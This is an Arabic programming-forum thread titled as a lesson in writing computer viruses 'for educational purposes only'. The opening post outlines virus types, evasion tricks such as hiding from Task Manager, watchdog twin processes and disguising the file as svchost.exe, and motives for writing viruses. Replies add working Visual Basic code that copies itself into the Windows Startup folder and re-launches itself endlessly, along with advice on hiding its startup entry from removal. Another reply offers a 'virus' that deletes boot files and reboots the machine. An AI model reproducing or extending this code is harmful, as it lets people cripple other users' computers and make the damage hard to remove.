• 0
LordCover

تعلم برمجة الفيروسات (للأغراض التعليمية فقط)

سؤال

لمحة عن الفيروسات (للأغراض التعليمية فقط!!!!)

قد يسأل بعض الأشخاص: لماذا تضع موضوعاً عن برمجة الفيروسات، هل أنت مبرمج فيروسات أو من أنصارها؟؟؟

و الجواب: عليك معرفة عدوك، فإذا عرفت كيف تتم برمجة الفيروسات تستطيع وضع مكافح لها و بالنهاية كله فائدة طالما أنه يصب ضمن اختصاصك.

لأننا مبرمجين فعلينا معرفة ماهية الفيروسات فحتى اليوم ما زالت الفيروسات تنتشر بشكل كبير و خصوصاً النوع الثاني منها(انظر أنواع الفيروسات).

الفيروسات: هي عبارة عن برامج مؤذية قد تأخذ عدة أشكال (exe, com, scr)، و مهمة هذه البرامج التخريب(و كلمة التخريب كلمة عامة و لبعض التفصيل: قد يكون التخريب حذف ملفات من على الجهاز، أو إنشاء ملفات جديدة لتعبئة القرص الصلب، تعطيل الملفات التنفيذية، الخ) و مهما كان نوع و شكل التخريب فهو مؤذ لأنه يتم بدون معرفة المستخدم.

و الفيروسات ليست برامج أضيف لها زر كتب فيه (اضغط هنا لتدمير جهازك :lol: ) بل غالباً ما يكون عملها في بداية تنفيذها(Form_Load).

بدايةً، للفيروسات عدة أنواع:

1 - الفيروس العادي: و هو يقوم بالتخريب داخل جهاز الكومبيوتر و ليس خارج حدوده أبداً.

2 - الفيروس الدودة: و هو يقوم بالتخريب أيضاً، و لكنه مزود بآليات انتشار عبر الشبكة أو الانترنت و هو أكثر أنواع الفيروسات خطراً على مخدمات الويب و مخدمات البريد الإليكتروني.

3 - الفيروس الطروادي(حصان طروادة): و جاءت تسميته من خلال طريقة عمله، حيث أنك تقوم بإرسال فيروس طروادي لأحد الأشخاص (الضحية هنا) و يقوم هذا الفيروس بفتح أحد المنافذ و من ثم تقوم باختراق الضحية من خلال المنفذ الذي تم فتحه و يحتاج التخريب في هذا الفيروس عملك المباشر المتزامن مع فتح المنفذ.

و غالباً ما يكون مع هذا النوع من الفيروسات برنامج يكون لدى المبرمج (المخترق) للتحكم بالضحية بعد فتح المنفذ.

ملاحظة: قد يتم دمج الأنواع الثلاثة معاً لزيادة التأثير و التصدي لمحاولات قمع الفيروس.

بعض الطرق التي يقوم بها مبرمجي الفيروسات للتصدي لمحاولات القمع:

1 - الانتشار: و بالتالي يصعب حذف جميع ملفات الفيروس و التي تكون نسخة طبق الأصل و لكنها أصبحت منتشرة بشكل لا يمكن مقاومته، تخيل نسخ ملف واحد فقط كل ثانية ماذا سيحصل لجهازك؟؟ و لا تنسى أن المبرمج هو الآمر الناهي هنا.

2 - إخفاء التطبيق من مدير المهام: و ذلك لمنع المستخدم من إغلاق برنامج الفيروس من خلال إدارة المهام و يتم حل هذه المشكلة من خلال برامج مشابهة لمدير المهام الخاص بالنظام و هي أفضل منه.

3 - طريقة كلب الحراسة: و هي طريقة ذكية تعتمد على وضع برنامجين من الفيروس بحيث كل منهما يختبر الثاني إن كان غير فعالاً فإن كان كذلك يقوم بتشغيله و العكس صحيح و منطقياً لا يمكن للمستخدم إنهاء البرنامجين في نفس اللحظة.

4 - التخفي و خداع المستخدم: و يتم ذلك باستبدال ملفات عادية تنفيذية من النظام بالفيروس أو تسمية الفيروس بأسماء مألوفة في النظام مثل svchost.exe.

5 - التحول و التغير: مثل فيروس الإيدز، و هي من أصعب أنواع الفيروسات (على كلاً من المبرمج(من حيث البرمجة) و المستخدم و برنامج مضاد الفيروسات (من حيث التصدي للفيروس قبل فوات الأوان فهذا النوع من الفيروسات لا يكتفي بتغيير خلفية سطح مكتبك :lol: )).

و قد يكون هناك طرق أخرى.

و هنا تطرح بعض الأسئلة نفسها: من الذي يصنع الفيروسات و ما هدفه من ذلك؟

بالنسبة للسؤال الأول: فالجواب سهل إما مبرمج أو شخص هاو للبرمجة أو شركات مضادات الفيروسات و هذه لعبة تجارية ذكية فهم يصنعون الفيروس و يضعون المضاد له

فرزق هذه الشركات يعتمد على وجود الفيروسات في الأسواق.

أما بالنسبة للسؤال الثاني:

فقد يصنعه بعض المبرمجين الذين يريدون الانتقام من شركاتهم التي قامت بطردهم من العمل و لديهم هنا نقطة قوية فهم يعرفون بيئة و طريقة عمل الشركة لأنهم كانوا أحد موظفيها.

أو قد يصنعه مبرمج لأحد الأسباب التالية:

1 - بغرض المرح فقط(المصطلح الانكليزي الشهير Just for fun).

2 - بغرض التسويق لمنتج أو لشركة أو لشخص من خلال نشر صورة مثلاً تحمل اسم الشركة التي يريد التسويق لها و هذا التسويق فريد من نوعه فهو تسويق إجباري :lol: .

3 - بغرض الشهرة (شهرة المبرمج نفسه).

4 - لإيذاء شخص بحد ذاته (و هذا ما يسميه مبرمجي الغرب بالانتقام الشخصي Personal Revenge).

و إلى الآن، أريد أخذ الإذن من المشرفين بإكمال هذه السلسلة التعليمية عن الفيروسات

ففي حال تم الموافقة سيتم وضع أكواد لفيروسات (و ليس برامج فيروسات جاهزة) من المستوى البسيط و حتى المتقدم.

فالرجاء من أحد المشرفين الرد إن كان يسمح لي بذلك. (علماً أن كل ما سيوضع الهدف منه التعليم ليس إلا، إلا إذا قام أحد الأعضاء بتجميع هذه الأكواد

و تحويلها إلى فيروس تنفيذي).

LORDCOVER

GOOD BYTE

تم تعديل بواسطه LordCover
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

46 إجابة على هذا السؤال .

  • 0

السلام عليكم

بصراحة، لم أجد التجاوب الكافي من قبل أعضاء المنتدى

و لذلك قررت إيقاف الدروس و إذا كنت فعلاً مهتم بالبقية أخي (مبرمج مبتدأ)

الرجاء، مراسلتي على إيميلي الشخصي، و شكراً.

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

لك يا أخي إذا سمحت كون أحسن منا وكمل الدروس

أنا اعذرني لأني ما عمبشارك بس إنتو ما خليتوا حاجة إلا وذكرتوها ، الرجاء تسامحنا وتكمل الدروس

وشكراً

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

اخي هناك من يتابع لكن لا يشكر لا عليك تابع فانا من اول المتابعين إن شاء الله ..

14 صفحة مسحت وتقول اخي ان لا ردود

الاعضاء لا يريدون تطويل الموضوع مرة اخرى

لكنهم يشكرونك مشكووور و ارجو ان تتابع اخي هنا

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

اتمنى انك ترجع للدروس اخي

نحن بالانتظار لكن لا نريد ان نشارك و تزيد عدد الصفحات بلا فائدة

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

في فكرة فايرس اقولها ما يروح الفايرس الا اذا فرمت الكمبيوتر (هذا ما اظنه)

تجعل الفايرس يشتغل مع الوندوز : (الطريقة) :

اجعل خاصية في الفورم : visable = false

اضف موديول واكتب فيه :

public declare function copyfile lib "kernel32" alias "FileCopyA" (byval name as string, byval path as string , byval num as long ) as long

وفي حدث form_load اكتب :

a = copyfile(App.EXEName & ".exe", "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\virus.exe", 1)

هذا بالنسبة الى عمله مع الوندوز اما هو كالاتي

shell app.path & app.exename & ".exe"

هذا الفايرس يفتح نفسه وعندما ينفتح يفتح نفسه مرة اخرى ..... ما لا نهاية :

مما يجعله الجهاز بطيء جدا ..... والسبب معروف

انصح بعدم تجربته ;)

تحياتي مبرمج مبتدا

تم تعديل بواسطه مبرمج مبتدا
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

شي حلو !

إنت عارف لما تعمل فايروس فيك تستخدم مكتبة EasyReg إلي أنا حطيتها بموضوع مكتبة الDLL تبع الأخ علاء ، دي رح تضفي شوية تعديلات حلوة على الجهاز

يعني مثل إنك تساوي My Computer اسمه Abboodd dude computer وتساوي الTip تبعه Get Awaaaaaay

وهذا ما بيحتاج غير للمكتبة ولسطرين

وأنا ما عبعمل دعاية :)

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

لكن اخي لا فائدة ان كنت اول ما بتفتح الكمبيوتر بصير لك كمبيوتر ابطئ منه في العالم ما فيه :D

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

السلام عليكم

بالنسبة لفيروسك اخي مبرمج مبتدا

ففكرته جميلة.

و تستطيع ايضا ان تقوم بحركة تزيد من قوته اكثر

بحيث اول ما يفتح البرنامج تمحي القيمة (من الريجستري مثلاً او الملف من Startup)

و في حدث Form_Unload للفورم تعيد وضع القيمة التي تجعله يشتغل مع بدء التشغيل.

و هكذا في حال حاول المستخدم تقصي الفيروس او مقاومته فانه لن يجد القيمة التي تجعله يبدا

مع بدء التشغيل.

LORD COVER

GOOD BYTE

1

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

اخي جرب انت الفايرس وهو من غير عمل ستارت اب

هل تستطيع عمل ايشيء ؟؟

يجب عمل رستارت لانه بطيء ولا يعمل ايشيء

يعني مش محتاج المستخدم يمحوه لانه ما يستطيع ...

ثانيا : اذا كان الفايرس مشغل كيف المستخدم بيمحوه ؟

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

السلام عليكم و رحمة الله و بركاتة

أقدم لكم أول فيروس بسيط قمت بإنشائه و فكرته بسيطة حيث يقوم بحذف ملف البوت الأساسية الموجودة في السي و هي

IO.SYS

NTDETECT.COM

MSDOS.SYS

AUTOEXEC.BAT

boot.ini

CONFIG.SYS

ثم يقوم بإعادة تشغيل الجهاز ، بعد ذلك لن يقوم الجهاز بعملية البوت و قم بإعادة تشغيل الجهاز من جديد مراراً و تكراراً

للإصلاح هذه المشكلة قم بنسخ الملفات أعلاه من C:\ قبل تطبيق البرنامج ثم قم بعميلة الإقلاع من أي قرص أخر ثم إنسخ الملفات إلى C:\ بدل الملفات المحذوفة.

تحذير : أنا لست مسوؤل من الأضرار الناتجة عن هذا البرنامج ((لاتوجد أي إجراءات أخرى غير الحذف المذكور))

\\ تم استبدال الملف وحذف الملف التنفيذي بداخله من قبل Junkie

VIRUS.zip

تم تعديل بواسطه Junkie
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

ماشاء الله عليكم

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

تنبيه هام لجميع المشاركين في الموضوع: ممنوع وضع ملفات تنفيذية في الملفات المرفقة - شفرات فقط بدون أي صيغة تنفيذية سواء ملفات exe او bat وأي مرفق يحوي على ملف تنفيذي (حتى لو احتوى على الشفرة) سيتم حذفه دون تنبيه يرجى أخذ العلم بهذا

يرجى من جميع المطلعين على الملفات المرفقة في المواضيع والتي يعلمون بوجود ملفات تنفيذية فيها من الآن فصاعداً التبليغ عنها ليتم اتخاذ الإجراء المناسب

تم تعديل بواسطه Junkie
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

الف شكر لLordCover ولجميع من ساهم فى هذا الموضوع المفيد جدآ والذى يعطينا خلفية جيدة جدآ عن عمل الفيروسات بجميع انواعها ونرجوا منكم اكمال باقى اجزاء الموضوع من برمجة التروجان والفيروسات الذكية

كما ارجو التركيز على كيفية اعتماد الفيرس او التروجان على نفسة فى العمل كملف قائم بذاتة فنحن نعلم ان جميع برامج الvb تحتاج الى ملفات اخرى حتى تستطيع العمل مثل مكتبات vb6 runtim ونحن نرى ان جميع برامج الفيرس والتروجان الموجودة لا تعتمد على اى ملفات خارجية.

وشكرآ على المعلومات القيمة مرة اخرى.

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

اخي lordcover نتمنى تكملة الدروس

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

شىء مؤسف اعزائى ان نهمل موضوع هام مثل هذا

نجرو اكمال الموضوع

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

السلام عليكم و رحمه الله و بركاته

موضوع بالفعل شيق و مفيد و جدا استفدت منه

و لكن للاسف كالعاده لا يكمل

و ارجوا من الله عز و جل ان الاخ يكمل الدروس لتعم الفائده للجميع

و شكرا على الدروس السابقة

تحياتي لكم

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

اخي الله يعطيك العافية و نحن معك في كل الدروس

واتمنى تثبيت الموضوع الذي ينقص العرب

مثل هذه الدروس

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0
اخي الله يعطيك العافية و نحن معك في كل الدروس

واتمنى تثبيت الموضوع الذي ينقص العرب

مثل هذه الدروس

نرجو من الأدارة تثبيت الموضوع نظرآ لأهميتة

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

شكر وتقدير لكم يا اخوان

نتمنى هكذا شباب عربي واعي

ان شاء الله تتطورون وتتقدمون

واعذروني على ردي المتأخر

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
  • 0

موضوع شيق وجميل لا اعتقد انى على قدرة ان استفيد منة فى الوقت الحالى لقد قمت بتسيف الموضوع وحين اوصل للمرحلة التى تهئ لي التطرق لمواضيع بهذة القوة سأستعين بصفحات الموضوع لتطوير .

كاتب الموضوع جزاك الله كل خير واتمنى ان تستمر فى الموضوع .

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
زوار
This topic is now closed to further replies.

  • يستعرض القسم حالياً   0 members

    لا يوجد أعضاء مسجلين يشاهدون هذه الصفحة .